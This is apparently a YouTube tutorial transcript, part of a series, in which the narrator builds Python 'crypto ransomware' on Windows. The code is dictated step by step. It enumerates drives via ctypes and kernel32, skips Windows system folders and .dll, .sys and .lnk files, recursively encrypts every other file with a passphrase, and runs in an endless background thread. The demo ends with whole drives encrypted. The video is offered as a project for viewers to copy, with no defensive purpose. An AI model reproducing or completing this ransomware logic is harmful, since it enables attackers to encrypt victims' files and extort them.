Hello, everyone, and welcome to our YouTube channel. Before we jump into today's topic, if you find this content valuable, please take a moment to subscribe our channel. It really helps us to bring you more great insights like this. And trust me, when it's come to what we are about to going to discuss, I don't think this particular content is still on YouTube. So you are in for something truly unique and essential. So let's get started. So, guys, today we will begin by introducing C type. So, C type is a crucial module for our project. We will explore its importance and how it works with WinDLL and kernel 32 to interact with Windows system functions such as retrieving drive letters. Next, we will modify the logic behind our file encryption. We will focus on extending encrypt AES function, which currently encrypts single function, but we will modify it to encrypt the whole directories. So this enhancement will streamline the bulk encryption. Following that, we will start coding our second module. This section will guide you through the practical implementations of WinDLL kernel 32, what are C types and threads. So kernel 32, which is considered as the heart of Windows API. So kernel 32 is a vital Windows DLL dynamic link library. We will discuss it next, which provide us the access to the core system level functions. Using ctypes.windll.kernel32, we can call any functions like get logic drives to list available drives, get tick count to count system uptime, and read file and write file for low level file operations. Next, DLL, which stands for Dynamic Link Library. So DLL is an executable file in Windows, which contain code and data usable by multiple programs simultaneously. It acts as a shared toolbox. When a DLL is loaded in Python via C types, we can invoke its internal function, enabling powerful scripts. For example, kernel32.dll provide access to Windows core function like memory management and input-output operations. So, guys, we will begin by introducing C-type, a crucial model for our project. We will explore its importance and how it works with the WinDLL and kernel 32 to interact with the Windows system function, such as retrieving drive letters. So in Python, we access Windows DLL using the CTime module. This allows us to call low-level Windows function just like native C or C++ programs. By using DLLs in Python, we can unlock Windows internal. We can write powerful automation tools. We can develop monitoring scripts or even malwares and gain raw system access from high-level Python without needing to compile C code. So Python threading module allows concurrent operations within a single program. A thread is a lightweight process sharing memory with the main program but running independently. This is useful for background tasks like monitoring files, encrypting data, or checking system activities without freezing the main application. For instance, in automation tools, we might start a thread to continue scan drives for new files. So in our script, to start encryption, we first use C types to talk to the Windows operating system through windll.kernel32. This let us use the get logical drives function, which gives us a code that show all active letters on the system. We then turn this code into a list of drives like C, D, and E by matching them to the letters. Next, we will figure out which drives are Windows system drives. We do this by looking at each drives and checking if it has important system folders like program files 86, or program data, users, and Windows right at its beginning. If these folders are there, it probably means that the drives has Windows installed or system software. So we add it to our list of system directories. Now, to make sure we are even more precise, we will use functions like is Windows system directory. So this function takes a folder and check if it's one of the non-system drives. This step is the key to knowing if a file or folder is in a critical part of the operating system. We also include a safety check for important system files. We look at their extensions. If a file ends with DLL, say a system or link, we identify it as a system file. We can then choose to skip these files or handle them carefully during encryption to avoid making the system unstable. As we are making our ransomware, crypto ransomware, so we don't need to encrypt the system files. Finally, we set up a continuous loop inside check and encrypt files. This loop constantly watches specific drives such as C, X, and Y. We are going to use in this project. Every time it calls another function, encrypt files and directories, and sends it the selected folders and the encryption password. This ongoing loop makes our script act like an automatic encryption agent, always looking for files to encrypt based on the rules we have set. So guys, now we will move to code our second module. So stay with me till the end. Okay guys, in the sample folder I have deleted the previous encrypted files and I have pasted a new file, as you can see, script.txt. Now let's open the encryptor.py. Now we will start from importing string. Import string. Next we are going to import c types. Okay, now from c types, c types, import WinDLL. Okay, now we will start coding from here. Here I will get all drives letter. Okay, now def get all drives underscore letters. Okay, now drives we will make a list, and bitmask is equal to WinDLL dot kernel 32 dot get logical drives. Yeah, now for I in range 26 and and one. Okay, drives dot append string ASCII uppercase, and I will pass the I, and I will backslash this. Okay, now return drives. Yeah, that's it. Now we will get on the next function. Let's first comment find Windows directory. Def find Windows directory. Oh, okay. Let me do it again. Def find Windows directory. Okay, we will drive. Yeah, drive, and possible system drives, and we will pass a list, make a list. Now target underscore folders. Now the folders which we gonna target. So in every window we know we have folders like program files, program data. We will also include users and windows. Okay, so we will type. Okay, we type program files, program files 86, and program data and users. Okay, let's include the Windows folder too. Yeah, Windows. Okay, now we'll check from our this program if these files include in any drive. For drive in get all drive letters, try, and then accept. Now in here we do not write exception. We will pass permission error, and file file not found, file not found. Okay, if this happened, then print f drive. Then I'm going to pass the drive cannot be accessed. Okay, now we will move back to the uh, drive part. Okay, continue. If this happens, continue. Okay, root underscore directories os dot list directory drive. Okay, now if any folder in root directories for folder in target folders, possible system drives, we have to pass here possible system drives up dot append os dot path. We will fetch the absolute path drive. Now we will return possible system drives. Now next, uh, check for system directory. Okay, def is Windows directory. We will pass here directory, and directory is equal to os.path.absolute path, and we'll pass a directory. Print directory and system drives is equal to find Windows drive. I will pass. Okay. Now return any os dot path dot common path, and we pass directory dot lower drive. Okay, we'll pass drive dot lower, and here is equal to drive dot lower. We are setting the validations actually. So next, for drive in system drives, now we will type the next function, check for system files, yes. Or you can also include the files you want to skip, like their extensions. Def is system files. I will pass here the file path, and then system files, uh, extension. Okay. Here I will make a list again, and I want to include three extensions like .dll. I don't want this Python script to encrypt DLL, and then system, and then link. Okay, I will return any file underscore path dot lower dot ends with ext for ext in system files extension. Okay. Now I have to make an all drive encryptor, so moving to the all drive encryptor, we have to comment these, so I will comment it as crypto key generator, and we'll comment it as encryption core. Yeah, and for this I will comment single file encryptor, yes. And below this I will make my new function, and I will type a comment here. Okay, I will comment it as all directory directory, encryptor, and def encrypt files in directories. I will pass directories and passphrase. Now for directory in directories, for root file in os.walk directory, and I will print a message here. Print scanning, and I will pass the root. Okay, if not is Windows directory, if the root is not Windows directory, then uh, for file in files, I have to check. I will pass the file path os dot path os dot path dot join. I will join the root and file. If not system files, I will pass the file, yeah, file path. I will pass the file path. Print f found will pass the file path, and encrypt file I will pass the file path here and the passphrase. Now else part. So else print uh, skipping system files, or I will pass the file path. Now we have to move to back and do the other else print. Now I will skip skipping system root if is the drive in which Windows is installed. Def check and encrypt files. I will pass the passphrase, and for directory in, now we have to write the drives we want to encrypt. Like in my case, I will try with the C, X, and Y. Okay, now we will type C, X, and Y. Okay, now encrypt files in directories, directory, and passphrase. Okay. Mm, Now we have to include the threads. So for this we have to write check underscore thread threading dot thread. I will set the target is equal to check and encrypt files, and I will give the argument passphrase. Okay, now check thread dot daemon is equal to true, and check thread dot start. Now we have to write the while loop. So while true time dot sleep, I will pass one, and we will pass this time while loop in the check and encrypt files too. So while true time dot sleep one. Okay, now uh, some indentations. Okay, now we have to include threading, import threading and time. So we will type import threading and import time. That's it. Now our code is ready. We have to some paste some dummy text, dummy files. So I will see if I have some like in documents. Okay, I will copy these now. Some random documents. Okay. Okay. Now I will paste them in X and in Y. Okay. Now let's go to the back to script and remove this and remove this. We don't need it actually. Now we have to check. I will run the code. Okay, it is giving us some error, and the error shows okay we don't some typo mistake, and why it is giving us the error. Okay, missing one required positional argument passphrase, but we have to pass the passphrase. uh, okay, the line number 113. So um, okay, you can see we put that in the we put directory and passphrase both in the list, so we only have to pass the directory in the list. And yes, as you can see, it is working. It is encrypting the recycle files. Okay, it is also showing that it is skipping some files. So our logics are working fine. As you can, system files, and okay, now it is giving the error permission denied. Okay, script is running fine. me stretch it a bit. Okay, I think we have to stop it because there is a lot of files in this C drive. So yeah, now as you can see, it is showing system files. It is giving me system file, and it is showing the permission denied error. Okay, and here you can see it. Okay, you can see the logics are working fine. Now we have to remove C and see if it's encrypting the files in X and Y drive. Let's start it again. Okay, you can see it is keeping the link system files and DLL. Okay, and the threadings are working fine as well. Okay, now let's see in the drive. Okay, as you can see, whole drive is encrypted now. So our code is working fine. So guys, let's just call it a day for now. And if you guys like this video, please subscribe and press the bell icon and share with your friends who want to do some projects like this. And thanks for watching.